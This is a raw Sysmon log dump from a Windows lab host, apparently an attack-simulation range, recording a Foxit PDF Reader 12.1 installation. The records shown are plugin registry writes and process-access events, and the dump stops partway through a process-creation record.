12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginDocumentum\FriendlyNameDocumentum Integration 13241300x800000000000000039365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\ACPPlugin\FriendlyNameACPPlugin 13241300x800000000000000039364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\AmanoTimeStamp\FriendlyNameAmanoTimeStamp 13241300x800000000000000039363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginOpenText\FriendlyNameOpenText Integration 13241300x800000000000000039362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginContentSyndication\FriendlyNameFoxitInnerPluginContentSyndication 13241300x800000000000000039361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginNdOffice\FriendlyNameNdOffice 13241300x800000000000000039360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginiManageWork\FriendlyNameiManage 9 Integration 13241300x800000000000000039359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginSubscribe\FriendlyNameFoxitInnerPluginSubscribe 13241300x800000000000000039358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginLicenseManager\FriendlyNameFoxitInnerPluginLicenseManager 13241300x800000000000000039357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitDrive\FriendlyNameFoxitInnerPluginFoxitDrive 13241300x800000000000000039356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginBrowser\FriendlyNameFoxitInnerPluginBrowser 13241300x800000000000000039355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginConnectedPDF\FriendlyNameFoxitInnerPluginConnectedPDF 13241300x800000000000000039354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitAccountManagement\FriendlyNameFoxitInnerPluginFoxitAccountManagement 13241300x800000000000000039353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginConnectedPDFDRM\FriendlyNameConnectedPDF DRM 13241300x800000000000000039352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginOFDViewer\FriendlyNameFoxitOFDViewer 13241300x800000000000000039351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginActionWizard\FriendlyNameActionWizard 13241300x800000000000000039350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginBoxPlugin\FriendlyNameBoxPlugin 13241300x800000000000000039349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginDropboxPlugin\FriendlyNameDropboxPlugin 13241300x800000000000000039348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginGoogleDrive\FriendlyNameGoogleDrive 13241300x800000000000000039347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginOneDriveForBusiness\FriendlyNameOneDriveForBusiness 13241300x800000000000000039346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginOneDrive\FriendlyNameOneDrive 13241300x800000000000000039345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerMetaDataHandling\FriendlyNameFoxitInnerMetaDataHandling 13241300x800000000000000039344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\CusIntelRMSPlg\FriendlyNameCusIntelRMSPlg 13241300x800000000000000039343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginShareReview\FriendlyNameShareReview 13241300x800000000000000039342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginReadOutLoud\FriendlyNameSpeech 13241300x800000000000000039341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginCPDFOCLink\FriendlyNameFoxitInnerPluginCPDFOCLink 13241300x800000000000000039340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginTouchup\FriendlyNameEdit Text 13241300x800000000000000039339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginPageEditor\FriendlyNameEdit Object 13241300x800000000000000039338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginIntegrateWithSP\FriendlyNameIntegrateWithSP 13241300x800000000000000039337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginWip\FriendlyNameWIP 13241300x800000000000000039336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitRMS_V2\FriendlyNameFoxitRMS_V2 13241300x800000000000000039335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FileOpen\FriendlyNameFileOpen 13241300x800000000000000039334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginDocuSign\FriendlyNameDocuSign 13241300x800000000000000039333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginComparePDF\FriendlyNameComparePDF 13241300x800000000000000039332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginCommentsSummary\FriendlyNameCommentsSummary 13241300x800000000000000039331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginPlgDynLoader\FriendlyNamePlgDynLoader 13241300x800000000000000039330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitUpdater\FriendlyNameFoxitUpdater 13241300x800000000000000039329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.907{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginCalculator\FriendlyNameAccounting Calculator 10341000x800000000000000039328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.777{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.777{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.762{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.762{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.762{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.762{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.762{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.762{FE4C2B44-E2B7-63C7-D405-00000000AF02}25441972C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+ad075|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+afbe7|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+d8818|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+e5510|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+e6401|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+e64c1|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+c9816|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+5cdc5|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+60d60|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+45cfd|C:\Users\ADMINI~1\AppData\Local\Temp\is-MQ6GS.tmp\FoxitPDFReader121_enu_Setup_Prom.tmp+60eb0 154100x800000000000000039320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.764{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe12.1.0.15250Foxit PDF Reader 12.1Foxit PDF ReaderFoxit Software Inc.FoxitPDFReader.EXE"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe"C:\Program Files (x86)\Foxit Software\Foxit PDF 